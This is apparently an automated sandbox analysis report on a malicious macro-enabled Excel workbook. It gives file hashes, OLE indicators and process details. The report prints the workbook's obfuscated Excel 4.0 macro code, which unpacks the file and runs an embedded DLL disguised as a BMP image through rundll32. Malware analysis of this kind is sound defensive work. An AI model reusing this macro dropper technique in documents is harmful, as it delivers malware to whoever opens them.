        Preview: .U.n.0....?..........C....I?....k..e....7..+.....W.3;+......'.....E5c...Ie..~.Y~e.Fa...B...zq.e......-...........y..Y.`D...r/..h._.fW.q6..eL9.b..V.Q..fC.........j.L.u~....!....J.OV.d.n.R.H.<..S.. $v.....E..=.HV.;..<...^f....@..3"...U...`.<....J...&..n..AI(.D...!..F.g..K....$.N.%l..U..2........e_..a.H..v...?....Jr.:......TC.=...)7......;...b.j.O6.O:....>.Vn?]...#:d..I..=.....D.......<...#.....2......BT..v.f....t..).... .p.|.-........PK..........!.2..'....3.......[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        Static File Info

        General

        File type:Microsoft Excel 2007+
        Entropy (8bit):7.891710388965609
        TrID:
        • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
        • ZIP compressed archive (8000/1) 16.67%
        File name:4468873941_759979693.xlsm
        File size:607568
        MD5:b5021bc6cc8e2fc2231978d6c9118f2a
        SHA1:c11430e1206f25bf768f1643f51bed8a4a1eec9d
        SHA256:5600e318bd25cb62a710d880649b11c4d85ae6f8ee5c2084a9d819a16abcd3b2
        SHA512:e4bd8a7522c45ecf9ed9d19cd0ba4fcc66669f3ec1d1f5539ca35418844926c1f3a8285de1f4d00e7c881be313e0916b462aa3809c44c5e910b1edef9d0eadfb
        SSDEEP:12288:ppex0VbLbGeH+59SjNGst3hglv595+6tLAJVX0cfxBNtsY69bWed0t:pUKVbLte52dt3i/+mAJ2gsY6oe2
        File Content Preview:PK..........!.........3.......[Content_Types].xml ...(.........................................................................................................................................................................................................

        File Icon

        Icon Hash:e4e2aa8aa4bcbcac

        Static OLE Info

        General

        Document Type:OpenXML
        Number of OLE Files:1

        OLE File "4468873941_759979693.xlsm"

        Indicators

        Has Summary Info:
        Application Name:
        Encrypted Document:
        Contains Word Document Stream:
        Contains Workbook/Book Stream:
        Contains PowerPoint Document Stream:
        Contains Visio Document Stream:
        Contains ObjectPool Stream:
        Flash Objects Count:
        Contains VBA Macros:

        Macro 4.0 Code

        ,,,"=SAVE.COPY.AS(""..\Nioka.meposv"")",run,,,,,,,dll32 ..\xl\media\im,,,,,,"=EXEC(""tar -xf ..\Nioka.meposv -C ..\"")=PI()=PI()=PI()","age2.bmp,StartW",,,,,,,,,,,,,,,,,,,,"=WAIT(NOW()+""00:00:06"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=PI()=PI()=PI()=EXEC(AL701&AL702&AL703)=PI()=PI()=PI(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,

        Network Behavior

        No network behavior found

        Code Manipulations

        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        System Behavior

        General

        Start time:19:33:37
        Start date:12/05/2021
        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Wow64 process (32bit):false
        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Imagebase:0x13fc00000
        File size:27641504 bytes
        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Disassembly

        Reset < >